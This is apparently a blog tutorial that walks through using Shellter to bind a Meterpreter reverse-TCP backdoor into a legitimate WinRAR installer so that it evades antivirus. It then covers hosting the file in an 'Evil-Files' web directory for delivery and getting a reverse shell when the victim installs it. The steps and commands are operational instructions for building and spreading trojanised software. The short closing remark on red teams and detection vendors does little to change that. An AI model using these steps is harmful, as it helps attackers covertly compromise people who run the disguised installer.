Creating a Stealthy Backdoor Using Shellter: A Guide
Written on
Chapter 1: Introduction to Shellter
Shellter serves as an invaluable tool for re-encoding any 32-bit Windows application, which can help in evading antivirus detection. When aiming to avoid detection, it’s essential to steer clear of anything that might raise red flags with antivirus software, such as compressed applications or those with multiple executable code sections. Shellter allows users to take standard 32-bit applications and embed shellcode—either a custom payload or one sourced from tools like Metasploit—in a manner that remains hidden from antivirus detection systems. This capability enables the creation of a vast array of signatures, making it extremely difficult for antivirus software to identify the malicious intent.
Section 1.1: Setting Up Shellter
After downloading the tool, extract the files and optionally move them to the /opt directory. For example:
(root@kali:~/Downloads# mv shellter /opt/).
Next, download a legitimate Windows executable application to use with Shellter for binding your backdoor. In this guide, we will utilize “Winrar.exe.”
Once downloaded, transfer the “Winrar.exe” file to the Shellter directory:
(root@kali:~/Downloads# mv Winrar.exe /opt/shellter/).
Now, launch the tool using the “wine” command:
(root@kali:/opt/shellter# wine shellter.exe).
At the start-up, you will see a welcome screen prompting you to select an operation mode. Choose “A” for auto mode and press “Enter.” It will then request the “PE Target:” name, which is the application you wish to bind the backdoor to—in this case, “Winrar.exe.”
Section 1.2: Binding the Backdoor
Once you’ve set the PE Target, Shellter will ask if you want to enable stealth mode. Depending on your scenario, you might choose to enable it, but for this demonstration, we will select “N” and proceed to payload selection.
Next, you can choose to utilize a listed payload or a custom one. To use a listed payload, type “L” and select one by its index number. For this guide, we will choose “1” for “Meterpreter_Reverse_TCP.”
Finally, enter the “LHOST” IP address for the attacking machine and specify the “LPORT” number to listen for incoming connections. Press “Enter” to complete the process and start the listener.
By default, Shellter will automatically initiate the multi-handler to wait for incoming connections.
Section 1.3: Testing the Backdoor
To test the infected “Winrar.exe” application on the target system, you need to move this file to your web server for easy delivery. For example:
(root@kali:/opt/shellter# mv Winrar.exe /var/www/html/Evil-Files/).
Once transferred, download and execute the file on the target machine. The standard WinRAR installation process will begin; however, in the background, your backdoor will execute, establishing a reverse shell connection. As shown, an active session will be initiated, allowing further interaction and exploitation.
Penetration testers within red teams often incorporate tools that use techniques borrowed from malicious software. Shellter exemplifies this approach, having roots in entry point obscuring (EPO) and polymorphic file-infector viruses. While it has gained popularity among penetration testers, it has also been adapted by cybercriminals.
Despite Shellter’s original intent not being malicious, it becomes a formidable tool in the hands of attackers due to its success in evading antivirus detection. Fortunately, solutions like CrowdStrike are capable of identifying and neutralizing such threats through continuous research and advanced next-generation antivirus capabilities.